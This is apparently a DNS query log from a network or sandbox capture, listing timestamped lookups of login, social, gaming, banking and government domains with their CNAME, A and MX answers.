                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.265002966 CET1.1.1.1192.168.2.60xca1aNo error (0)account.live.comaccount.msa.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.276609898 CET1.1.1.1192.168.2.60xd71eNo error (0)lookaside.fbsbx.comscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.278448105 CET1.1.1.1192.168.2.60x5ef2No error (0)tiktok.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.278448105 CET1.1.1.1192.168.2.60x5ef2No error (0)tiktok.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.278448105 CET1.1.1.1192.168.2.60x5ef2No error (0)tiktok.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.279723883 CET1.1.1.1192.168.2.60x9917Name error (3)mobile.liga365gacor.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.289933920 CET1.1.1.1192.168.2.60xe5f4Name error (3)app.jobpet.com.brnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.293723106 CET1.1.1.1192.168.2.60x5018Server failure (2)signup.takendelight.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.293760061 CET1.1.1.1192.168.2.60x3ba1No error (0)genshin.mihoyo.comgenshin.mihoyo.com.w.kunlunsl.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.306848049 CET1.1.1.1192.168.2.60xffccNo error (0)api.cmrsanmartin.ziz.clcmrsanmartin.ziz.clCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.317842007 CET1.1.1.1192.168.2.60xdfeeNo error (0)naukrigulf.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.327487946 CET1.1.1.1192.168.2.60x4de6No error (0)foros.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.363962889 CET1.1.1.1192.168.2.60x2b48No error (0)iam.gov.saMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.363962889 CET1.1.1.1192.168.2.60x2b48No error (0)iam.gov.saMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.373924971 CET1.1.1.1192.168.2.60xe5a6Name error (3)sii.itzacatepec.edu.mxnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.392692089 CET1.1.1.1192.168.2.60x84dcNo error (0)pan.baidu.comyiyun.n.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.402916908 CET1.1.1.1192.168.2.60xfde8No error (0)uh.isMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.432302952 CET1.1.1.1192.168.2.60xeba4No error (0)rage.mpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.443363905 CET1.1.1.1192.168.2.60xe1d8Name error (3)auth.cambridgelms.orgnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.460764885 CET1.1.1.1192.168.2.60x2b10No error (0)chainmine.ioMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.461250067 CET1.1.1.1192.168.2.60x8df0No error (0)casinocontroller.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.461250067 CET1.1.1.1192.168.2.60x8df0No error (0)casinocontroller.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.461807013 CET1.1.1.1192.168.2.60x58e2No error (0)ucv.blackboard.comlearn-prod-5ea8899e63bc1-2104512027.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.504791975 CET1.1.1.1192.168.2.60xedaNo error (0)auth.riotgames.comauth.riotgames.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.509851933 CET1.1.1.1192.168.2.60x17b4No error (0)cjdropshipping.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.519005060 CET1.1.1.1192.168.2.60x3291No error (0)instructory.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.519005060 CET1.1.1.1192.168.2.60x3291No error (0)instructory.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.519005060 CET1.1.1.1192.168.2.60x3291No error (0)instructory.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.519005060 CET1.1.1.1192.168.2.60x3291No error (0)instructory.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.519005060 CET1.1.1.1192.168.2.60x3291No error (0)instructory.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.519005060 CET1.1.1.1192.168.2.60x3291No error (0)instructory.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.520104885 CET1.1.1.1192.168.2.60x70abNo error (0)pl-pl.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.520104885 CET1.1.1.1192.168.2.60x70abNo error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.533665895 CET1.1.1.1192.168.2.60x4bf7No error (0)discord.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.533665895 CET1.1.1.1192.168.2.60x4bf7No error (0)discord.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.533665895 CET1.1.1.1192.168.2.60x4bf7No error (0)discord.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.533665895 CET1.1.1.1192.168.2.60x4bf7No error (0)discord.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.533665895 CET1.1.1.1192.168.2.60x4bf7No error (0)discord.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.534481049 CET1.1.1.1192.168.2.60xdd03No error (0)nuevopacto.runacode.com172.66.43.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.534481049 CET1.1.1.1192.168.2.60xdd03No error (0)nuevopacto.runacode.com172.66.40.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.534872055 CET1.1.1.1192.168.2.60x5d65No error (0)account.booking.comdu1b3vb35hc0o.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.536202908 CET1.1.1.1192.168.2.60xe5daNo error (0)accounts.snapchat.comweb-gcp.api.snapchat.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.536202908 CET1.1.1.1192.168.2.60xe5daNo error (0)web-gcp.api.snapchat.comweb-gcp.api.sc-gw.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.546478987 CET1.1.1.1192.168.2.60xdaf3Name error (3)vidcorn.tvnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.547492027 CET1.1.1.1192.168.2.60x3618Name error (3)tls21.netnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.547949076 CET1.1.1.1192.168.2.60x3731No error (0)pt.secure.imvu.comsecure.imvu.sl.smartling.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.595396996 CET1.1.1.1192.168.2.60x396aNo error (0)genshin.mihoyo.com.w.kunlunsl.com8.45.52.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.595396996 CET1.1.1.1192.168.2.60x396aNo error (0)genshin.mihoyo.com.w.kunlunsl.com8.45.52.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.595396996 CET1.1.1.1192.168.2.60x396aNo error (0)genshin.mihoyo.com.w.kunlunsl.com8.45.52.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.595396996 CET1.1.1.1192.168.2.60x396aNo error (0)genshin.mihoyo.com.w.kunlunsl.com8.45.52.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.632841110 CET1.1.1.1192.168.2.60xa4e3No error (0)pan.baidu.comyiyun.n.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.632841110 CET1.1.1.1192.168.2.60xa4e3No error (0)yiyun.n.shifen.com124.237.208.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.632841110 CET1.1.1.1192.168.2.60xa4e3No error (0)yiyun.n.shifen.com36.110.192.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.647077084 CET1.1.1.1192.168.2.60x5302No error (0)hero-wars.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.660250902 CET1.1.1.1192.168.2.60xef85No error (0)accounts.ecitizen.go.keaccounts.ecitizen.go.ke.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.661582947 CET1.1.1.1192.168.2.60x626cNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.663055897 CET1.1.1.1192.168.2.60xd3a0No error (0)us-smtp-inbound-2.mimecast.com205.139.110.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.663055897 CET1.1.1.1192.168.2.60xd3a0No error (0)us-smtp-inbound-2.mimecast.com205.139.110.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.663055897 CET1.1.1.1192.168.2.60xd3a0No error (0)us-smtp-inbound-2.mimecast.com207.211.30.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.663055897 CET1.1.1.1192.168.2.60xd3a0No error (0)us-smtp-inbound-2.mimecast.com207.211.30.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.663055897 CET1.1.1.1192.168.2.60xd3a0No error (0)us-smtp-inbound-2.mimecast.com207.211.30.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.663055897 CET1.1.1.1192.168.2.60xd3a0No error (0)us-smtp-inbound-2.mimecast.com205.139.110.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.663367987 CET1.1.1.1192.168.2.60xbf7eNo error (0)phonandroid.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.663367987 CET1.1.1.1192.168.2.60xbf7eNo error (0)phonandroid.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.663367987 CET1.1.1.1192.168.2.60xbf7eNo error (0)phonandroid.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.663367987 CET1.1.1.1192.168.2.60xbf7eNo error (0)phonandroid.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.663367987 CET1.1.1.1192.168.2.60xbf7eNo error (0)phonandroid.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.668576956 CET1.1.1.1192.168.2.60x3bcdNo error (0)app.plex.tv104.18.41.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.668576956 CET1.1.1.1192.168.2.60x3bcdNo error (0)app.plex.tv172.64.146.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.669662952 CET1.1.1.1192.168.2.60x5320No error (0)virtuadopt.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.669662952 CET1.1.1.1192.168.2.60x5320No error (0)virtuadopt.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.669662952 CET1.1.1.1192.168.2.60x5320No error (0)virtuadopt.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.742346048 CET1.1.1.1192.168.2.60xe1b5No error (0)aeaaamorim.inovarmais.com104.26.14.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.742346048 CET1.1.1.1192.168.2.60xe1b5No error (0)aeaaamorim.inovarmais.com104.26.15.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.742346048 CET1.1.1.1192.168.2.60xe1b5No error (0)aeaaamorim.inovarmais.com172.67.69.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.743293047 CET1.1.1.1192.168.2.60xa4e3No error (0)pan.baidu.comyiyun.n.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.743293047 CET1.1.1.1192.168.2.60xa4e3No error (0)yiyun.n.shifen.com36.110.192.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.743293047 CET1.1.1.1192.168.2.60xa4e3No error (0)yiyun.n.shifen.com124.237.208.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.743315935 CET1.1.1.1192.168.2.60xb6dbNo error (0)auth.riotgames.comauth.riotgames.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.745578051 CET1.1.1.1192.168.2.60x3cf3No error (0)web.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.745578051 CET1.1.1.1192.168.2.60x3cf3No error (0)star.c10r.facebook.com31.13.65.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.749979973 CET1.1.1.1192.168.2.60x880eNo error (0)connect.appen.com3.163.115.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.749979973 CET1.1.1.1192.168.2.60x880eNo error (0)connect.appen.com3.163.115.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.749979973 CET1.1.1.1192.168.2.60x880eNo error (0)connect.appen.com3.163.115.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.749979973 CET1.1.1.1192.168.2.60x880eNo error (0)connect.appen.com3.163.115.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.751498938 CET1.1.1.1192.168.2.60x69f3No error (0)hero-wars.com18.200.3.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.752387047 CET1.1.1.1192.168.2.60x8114No error (0)accounts.snapchat.comweb-gcp.api.snapchat.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.752387047 CET1.1.1.1192.168.2.60x8114No error (0)web-gcp.api.snapchat.comweb-gcp.api.sc-gw.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.752387047 CET1.1.1.1192.168.2.60x8114No error (0)web-gcp.api.sc-gw.com34.149.46.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.752418995 CET1.1.1.1192.168.2.60xfb46No error (0)tiktok.com13.249.120.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.752418995 CET1.1.1.1192.168.2.60xfb46No error (0)tiktok.com13.249.120.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.752418995 CET1.1.1.1192.168.2.60xfb46No error (0)tiktok.com13.249.120.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.752418995 CET1.1.1.1192.168.2.60xfb46No error (0)tiktok.com13.249.120.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.753051996 CET1.1.1.1192.168.2.60x4e2eNo error (0)accounts.google.com142.250.105.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.755140066 CET1.1.1.1192.168.2.60x736fNo error (0)accounts.binance.comd2dbdn71e1vorj.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.755140066 CET1.1.1.1192.168.2.60x736fNo error (0)d2dbdn71e1vorj.cloudfront.net3.161.136.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.755140066 CET1.1.1.1192.168.2.60x736fNo error (0)d2dbdn71e1vorj.cloudfront.net3.161.136.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.755140066 CET1.1.1.1192.168.2.60x736fNo error (0)d2dbdn71e1vorj.cloudfront.net3.161.136.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.755140066 CET1.1.1.1192.168.2.60x736fNo error (0)d2dbdn71e1vorj.cloudfront.net3.161.136.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.756198883 CET1.1.1.1192.168.2.60xa88dNo error (0)casinocontroller.com104.22.43.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.756198883 CET1.1.1.1192.168.2.60xa88dNo error (0)casinocontroller.com172.67.11.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.756198883 CET1.1.1.1192.168.2.60xa88dNo error (0)casinocontroller.com104.22.42.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.883192062 CET1.1.1.1192.168.2.60x2a85No error (0)chainmine.io64.91.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.885124922 CET1.1.1.1192.168.2.60xe06eNo error (0)m.codere.com.co5s5tsl3.impervadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.885124922 CET1.1.1.1192.168.2.60xe06eNo error (0)5s5tsl3.impervadns.net45.60.0.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.885144949 CET1.1.1.1192.168.2.60xe06eNo error (0)m.codere.com.co5s5tsl3.impervadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.885144949 CET1.1.1.1192.168.2.60xe06eNo error (0)5s5tsl3.impervadns.net45.60.0.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.891324043 CET1.1.1.1192.168.2.60xf8a6No error (0)sigapbanjarmasin.info35.186.223.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.914720058 CET1.1.1.1192.168.2.60x6aedNo error (0)iam.gov.sa78.93.109.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.919867992 CET1.1.1.1192.168.2.60x3753Server failure (2)signup.takendelight.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.940807104 CET1.1.1.1192.168.2.60x9e86Name error (3)auth.cambridgelms.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.949553967 CET1.1.1.1192.168.2.60xbe2eNo error (0)uh.is82.221.28.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.954782009 CET1.1.1.1192.168.2.60x2427No error (0)srienlinea.sri.gob.ec190.152.216.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.960376024 CET1.1.1.1192.168.2.60x6bd5No error (0)mitextoescolar.mineduc.cl163.247.44.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.963051081 CET1.1.1.1192.168.2.60x9633No error (0)service.uan.edu.co186.28.225.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.968729973 CET1.1.1.1192.168.2.60xfa74Name error (3)netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.989564896 CET1.1.1.1192.168.2.60x1fe1No error (0)mw.redsa.net77.240.114.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.029937029 CET1.1.1.1192.168.2.60x82beName error (3)etd.lib.tuke.sknonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.068164110 CET1.1.1.1192.168.2.60x4e92No error (0)kwyk.fr34.250.93.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.087120056 CET1.1.1.1192.168.2.60x13f3No error (0)www2.personas.santander.com.ar200.61.38.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113547087 CET1.1.1.1192.168.2.60xc4e8No error (0)student.emis.gov.eg41.33.126.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113620996 CET1.1.1.1192.168.2.60x482fNo error (0)mega.nzMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113636017 CET1.1.1.1192.168.2.60x83c3No error (0)mobilsam.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113636017 CET1.1.1.1192.168.2.60x83c3No error (0)mobilsam.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113713026 CET1.1.1.1192.168.2.60x82beName error (3)etd.lib.tuke.sknonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113728046 CET1.1.1.1192.168.2.60xd7d5No error (0)followerstiktok.xyz103.224.182.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113742113 CET1.1.1.1192.168.2.60x6bd5No error (0)mitextoescolar.mineduc.cl163.247.44.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113755941 CET1.1.1.1192.168.2.60x3eecNo error (0)nossoplayer.me162.241.203.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113770008 CET1.1.1.1192.168.2.60x968eNo error (0)pl-pl.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113770008 CET1.1.1.1192.168.2.60x968eNo error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113770008 CET1.1.1.1192.168.2.60x968eNo error (0)star.c10r.facebook.com31.13.65.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113882065 CET1.1.1.1192.168.2.60xdaa4No error (0)api.cmrsanmartin.ziz.clcmrsanmartin.ziz.clCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113882065 CET1.1.1.1192.168.2.60xdaa4No error (0)cmrsanmartin.ziz.cl138.197.59.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113908052 CET1.1.1.1192.168.2.60xccc9Name error (3)app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113965988 CET1.1.1.1192.168.2.60xdc16No error (0)foros.net64.190.63.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.113981009 CET1.1.1.1192.168.2.60x9418No error (0)21dukes.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.114041090 CET1.1.1.1192.168.2.60xfa74Name error (3)netcsomagom.dpd.hunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.114144087 CET1.1.1.1192.168.2.60x991aName error (3)tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115289927 CET1.1.1.1192.168.2.60x6aaeNo error (0)poligrafosecuador.com104.21.71.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115289927 CET1.1.1.1192.168.2.60x6aaeNo error (0)poligrafosecuador.com172.67.170.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115304947 CET1.1.1.1192.168.2.60x3fa4No error (0)account.booking.comdu1b3vb35hc0o.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115304947 CET1.1.1.1192.168.2.60x3fa4No error (0)du1b3vb35hc0o.cloudfront.net3.161.150.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115304947 CET1.1.1.1192.168.2.60x3fa4No error (0)du1b3vb35hc0o.cloudfront.net3.161.150.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115304947 CET1.1.1.1192.168.2.60x3fa4No error (0)du1b3vb35hc0o.cloudfront.net3.161.150.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115304947 CET1.1.1.1192.168.2.60x3fa4No error (0)du1b3vb35hc0o.cloudfront.net3.161.150.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.115319014 CET1.1.1.1192.168.2.60xfb46No error (0)tiktok.com13.249.120.86A (IP address)IN (0x0001)false
